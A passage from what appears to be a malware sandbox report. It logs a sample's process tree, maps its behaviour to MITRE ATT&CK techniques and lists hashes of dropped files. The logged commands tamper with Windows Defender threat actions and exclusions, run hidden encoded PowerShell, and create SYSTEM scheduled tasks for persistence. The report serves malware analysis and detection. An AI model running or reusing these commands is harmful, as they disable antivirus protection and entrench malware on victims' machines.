  PID:5432
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:684
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3748
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6068
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5956
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5148
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2652
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5904
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5164
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4808
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3092
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3612
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:6072
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2176
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MiKcmJhqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4548
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5816
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5156
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1876
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2860
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3836
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:216
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5064
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5128
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4084
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5888
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gXtGDpGHO"
  2⤵
  PID:872
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gXtGDpGHO" /SC once /ST 05:51:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:5276
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "OvvioKEypuBLsTFYZ"
  2⤵
  PID:3528
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 11:41:57 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\whtBcZm.exe\" dM /UJsite_idhZk 385118 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4180
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gXtGDpGHO"
  2⤵
  PID:3912

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:5188
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5508

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1064

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5288

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:32
1⤵
PID:6016

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
1⤵
PID:3936

C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\whtBcZm.exe
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\whtBcZm.exe dM /UJsite_idhZk 385118 /S
1⤵
PID:3032
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:6116
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:5632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\GLapxx.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:224
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:3140
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"
  2⤵
  PID:5940
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "tCfKGXDvAPRRvLf"
  2⤵
  PID:2112
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "tCfKGXDvAPRRvLf"
  2⤵
  PID:684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "yUJcmcRyNwKRa2" /F /xml "C:\ProgramData\UrkGLyjigLRybTVB\WQoSPNX.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6136
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "WLJiZzmdxByrvR" /F /xml "C:\Program Files (x86)\WQqkELkVHOYU2\TsEMMXJ.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6116
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "iOUfqyxVtpISCFCEp2" /F /xml "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\fBHeTMS.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:6104
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "phKAbPCvhOcihqTrHht2" /F /xml "C:\Program Files (x86)\mQvpiNUsNPjLC\QNlFraV.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:5900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "tCfKGXDvAPRRvLf2" /F /xml "C:\Program Files (x86)\MiKcmJhqU\qWMiEPI.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1340
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "hNXJOWJzZwASvpUks"
  2⤵
  PID:1680
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "hNXJOWJzZwASvpUks" /SC once /ST 14:22:08 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YYFeagcQEOcPvCau\QAasWDiM\LDMIDlg.dll\",#1 /vCsite_idEDU 385118" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:5948
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "OvvioKEypuBLsTFYZ"
  2⤵
  PID:5820
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:5624
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:2532

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
1⤵
PID:2104

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\QAasWDiM\LDMIDlg.dll",#1 /vCsite_idEDU 385118
1⤵
PID:4300
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "hNXJOWJzZwASvpUks"
  2⤵
  PID:5988

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\QAasWDiM\LDMIDlg.dll",#1 /vCsite_idEDU 385118
1⤵
PID:1356

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
1⤵
PID:1976

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
1⤵
PID:4948

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

Filesize
16KB

MD5
65829597751b4eb426c83459f265814c

SHA1
5771a79852d28455989827d2f7a0dacbff09b83c

SHA256
4e4af6ce2599439f9766a5e2e140c438524e69aef4f139c945f541db375a0f92

SHA512
47f3a11dcc324b45eb0b28feb1d97c515ea88ab4a020d42f26a03b8b129e2cad1c73e096fbc54016cdc6b76bf4ce1900ef1ec24d7d8dcb6f1bc329f9017ef447

Download Submit
C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\mozglue.dll

Filesize
1KB

MD5
b8916f445195adf0ccd5396d55a4e005

SHA1
5ca47e0ed1a8ae5e39baa4565fa8fe50d6b7251a

SHA256
e3710bfe6fbebcc17d70424f3e6ab5684a5b2856382fecb3a5a6690a9f33039f

SHA512
002014a5b1e2fbd0076782df2125be42d41eb0a1d8241ccfbbd7a0819d0205813053aedfa60854f8d90553bc098e6fb0d88a6e8b32859ba87243fbc9411f44bc

Download Submit
C:\ProgramData\mozglue.dll

Filesize
88KB

MD5
42fd5ef867e323719afc7eb0cb383984

SHA1
68cd8194ed878ca12b901e4422886679b4810265

SHA256
0d96c4e405e516c158f1908cd626d801b0efd905b9831de28083c7cc38c20f1e

SHA512
ece8fa8448fb44b2168d4332e0ef65ad891657febabfc89f711877182dc41c58f498c610dcd969b4e45b446a81745e3139ab8599fe65933c28935523a9b2b002

Download Submit
C:\ProgramData\nss3.dll

Filesize
37KB

MD5
5f6ed20f02614e317c13a5009cef9e93

SHA1
f692097a77982de49d0a4c0da9a63c6df829f7a2

SHA256
f19e81b3224a82319e1b362bd1b25b12433106fb0789d6cfb96dd6f9283c32b7

SHA512
0289f55994398aae29d079235171b89b89d2a25a11fd596da36df302a7e0e9c95593793bee727afcfaaabd2f2e3a151f1e761792870ad5d1efc0a1b324de61b6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
